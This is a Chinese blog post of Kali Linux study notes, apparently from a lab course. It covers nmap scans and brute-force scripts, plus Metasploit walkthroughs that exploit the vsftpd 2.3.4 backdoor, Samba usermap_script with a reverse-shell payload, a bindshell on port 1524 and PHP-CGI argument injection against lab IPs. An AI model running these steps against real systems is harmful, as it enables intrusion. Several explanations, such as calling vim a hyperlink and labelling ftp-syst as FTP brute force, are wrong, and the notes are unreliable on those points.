kali学习与指令总结

Posted clusters_of_star

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了kali学习与指令总结相关的知识,希望对你有一定的参考价值。

常用文件修改指令
```1、复制命令 cp
用法:# cp 源文件/目标文件夹    
将源文件复制到目标文件夹下 如:
cp 1.txt /root/2.txt
将1.txt文件复制到root目录下2.txt
cp -r 复制目录

2、删除命令 rm
用法:rm 文件名  
rm 1.txt 删除1.txt文件  
rm - rf 强制删除文件夹

3、移动、重命名 mv
用法:移动, mv 原文件  /目标文件夹    
mv 1.txt /root/ 将1.txt移动到root目录下

4.touch user.txt 创建user文件

## Linux用户新建
``` useradd -m username 更改用户名
      passwd  username更改用户名的密码
      adduser usename 添加用户名
      passwd [用户名]    更改密码
      usermod -a -G sudo username -a  仅和-G一块使用,将用户添加到附属组群。
      CTRL+Z 强制退出msfconsole工具中

设置kali的ip地址

 vim    /etc/network/interfaces  提取root权限
 auto  eth0 #开机自动激活
 iface eth0 inet static #静态IP
 address 192.168.1.1 #本机IP 
 netmask 255.255.255.0 #子网掩码
 gateway 192.168.1.1 #网关
-------------------------------
/etc/init.d/networking restart 重启网卡服务

SSH远程连接服务

systemctl status ssh   先查看开启或未开的状态
systemctl start ssh    运行远程服务命令
systemctl enable ssh   设置为开机自启的命令
vim /etc/ssh/ssh_config     
vim是超级链接,etc目录  vim前后必须加空格 vi是普通文本
login 登录 prohibit 阻止
permit root login : prohibit-password 
不将上面的命令改为yes,只能用dcn用户登录

kali工具介绍

nmap工具的使用
   nmap 识别活跃主机 (网络安全扫描)
           1.列举网络主机清单
            2.管理服务升级调度
             3.监控主机
             4.服务运行状况
nmap扫描端口状况
       -Open(开放的):应用程序正在这个端口上监听连接
        -Closed(关闭的):端口对探测做出了响应,但是现在没有应用程序在监听这个端口。
        -Filtered(过滤的):端口没有对探测做出响应,但是现在没有应用程序在监听这个端口
       -Unfiltered(未被过滤的):端口对探测做出来响应,但是Nmap无法确定它们是关闭还是开放。
        -Open/Filtered:端口被过滤或者是开放的,Nmap无法做出判断。
        -Closed/Filtered:端口被过滤或者是关闭的,Nmap无法做出判断。   

具体指令
  指纹识别    
        nmap -sP    //同于其他的扫描,他只扫描该网段下的端口,不是发现开放端口的
 SYN半开放扫描 
        nmap -sS 1.1.1.1 tcp SYN Scan (sS)    //这是一个基本的扫描方式,半开放式扫描因为这种技术使得 Namp不需要通过完整的握手能够获得远程主机的信息
     nmap -sV 172.16.208.220 -ox 文件名.txt 将扫描的结果保存在文件名.txt(可以更换扫描方式)
      nmap -v -sV 172.16.208.0/24 -oA subnet_1 
        nmap -sV    //搜索服务版本信息 
        nmap -v     //详细输出扫描情况 
        -oA     //-oA将数据以图表的形式展现出来
        subnet_1   //子网的意思
sT TCP扫描
        nmap -O 1.1.1.1    //扫描目标操作系统
        PN NO ping  //扫描
        nmap -O -PN 192.168.1.1/24 
     //如果远程主机有防火墙IDS和IPS系统你可以使用-PN命令来确保不ping远程主机因为有时候防火墙会组织掉ping请求,-PN命令 告诉Nmap不用ping远程主机  
      nmap -A OS       //识别,版本探测,脚本扫描和traceroute综合扫描
 NSE脚本扫描
     nmap --script vuln <target>      //(script这个文件名主要放置脚本)漏洞扫描
     nmap --script=mysql-brute <target>   // mysql爆破     (p22为端口号)
     nmap -p22 --script=ssh-brute 1.1.1.1    //ssh爆破
     nmap -p21 --script ftp-syst 1.1.1.1    //ftp爆破  
      nmap -p 21 --script ftp-anon.nse -v 192.168.3.23      //ftp-anon.nse 检查目标ftp是否允许匿名登录,光能登陆还不够,它还会自动检测目录是否可读写,比如你想快速批量抓一些ftp(视频上演示的是TCP)
      nmap -sP 172.16.208.0/24    //扫描该网段的主机信息
      nmap -p 22-30 172.16.208.0/24    //指定端口范围扫描该网段下的端口号
 UDP服务
     nmap -sU 1.1.1.1     //用nmap扫描UDP服务
      nmap -Pn   //端口扫描
metasplit
在kali终端输入msfconsole

在kali里搜索searchsploit(精确搜索)
在msf将kali搜索下的漏洞加以搜索
输入指令 use unix/irc...
      info  查找信息 
      set rhost IP地址 
      run 运行
      whoami  展示当前用户名
      halt 立刻关机
      reboot 立刻重启
      back 返回msf工具

metasplit meterpreter
Meterpreter是Metasploit框架中的一个杀手锏,通常作为利用漏洞后的进攻载荷所使用,双击载荷在触发漏洞后能够返回给一个控制通道
      help:查看帮助信息
      background:允许用户在后台Meterpreter会话
      downland:允许用户从目标主机上下载文件
      upload:允许用户上传文件到目标主机
      shell:允许用户在目标主机上(仅是Windows主机)运行Windows shell命令
windows运行cmd命令 Linux运行daish
      session -i:允许用户切换会话
      ps:用于捕获目标主机正在运行的任务进程

metasplit进行信息搜索(msf)
扫描内容/方法:
      nmap -v -sV 网络/掩码 -oA 文件名称
       nmap -sV 搜索服务版本信息 
        nmap -v 详细输出扫描情况 
        -oA -oA将数据以图表的形式展现出来
扫描数据处理:
      cat subne_1.gnmap | grep 80/open | awk \'{print $2}\'
搜索这个文件中80端口的IP地址数
      search portscan 端口扫描
      cat /etc/passwd查找所有用户的列表
      w 可以查找当前活跃的用户列表
      cat /etc/group 查看用户组
      userdel 用户 删除用户
      userdel -f 连同用户目录一并删除

FTP漏洞扫描 
      search vsftp
      [vsftp]是FTPserver段上的服务[在2.3.4版本中有漏洞]
FTP漏洞扫描
      search ftp_version 查找ftp版本  {version版本}
      use exploit/unix/ftp/vsftpd_234_backdoor 

搜索mysql数据库
      use auxiliary/scanner/mysql/mysql_login 进入这个目录
      touch user.txt 生成一个user.txt
      创建一个user.txt 写入用户
      创建另一个pass.txt 写入密码(随便写入)
      show options 显示配置
           1.set rhosts 172.16.208.0
           2.set threads 100 线程数为100 平时为单线程
           3.set  pass_user  /home/dcn/pass/txt
           4.set  pass_FILE   /home/dcn/pass/txt
        mysql -h 172.16.208.0 -uroot -p
         mysql -h 【-h选择主机】172.16.208.0  -uroot 【uroot提示无密码】
    有密码后面加 -p 

metasploit samba 漏洞
扫描端口
           nmap -sV -p 139 445 IP地址 探测目标端口服务版本信息
进入msfconsole 搜索脚本
           search samba 
           use exploit/multi/samba/usermap_script  配置对应的payload show payloads
           set payload cmd/unix/reverse 
           set lhost 172.16.208.220 输入本机ip 

metasploit 弱口令
           nmap -sV 172.16.208.215 探测目标IP的端口
           nc 172.16.208.215 1524 (1524为端口号)  

metasploit php cgi 漏洞利用
       nmap -sV -p80 172.16.1.1 
       cd /usrshare/nmap/scripts 进入这个目录之后
       ls | grep php-version 筛选搜索这个脚本
       在kaili上输入或在msfconsole控制台输入
       nmap --script http-php-version -p80 172.16.208.0 查找是否有符合的漏洞

use exploit/multi/http/php_cgi_arg_injiection 进行漏洞利用
       set rhost 172.16.208.1 
       exploit 之后进入meterperter会话
       ? 可以观看可执行操作
      进入这个模式就可以查看目录获取flag值
       background 切到后台
       sessions 回到先前控制台

以上是关于kali学习与指令总结的主要内容,如果未能解决你的问题,请参考以下文章

(总结五)Linux指令学习——软件管理

Kali Linux下信息搜集工具(命令)使用总结

一起学习kali linux

sh Kali Linux - 资源和片段

《网络攻防》第七周学习总结

学习总结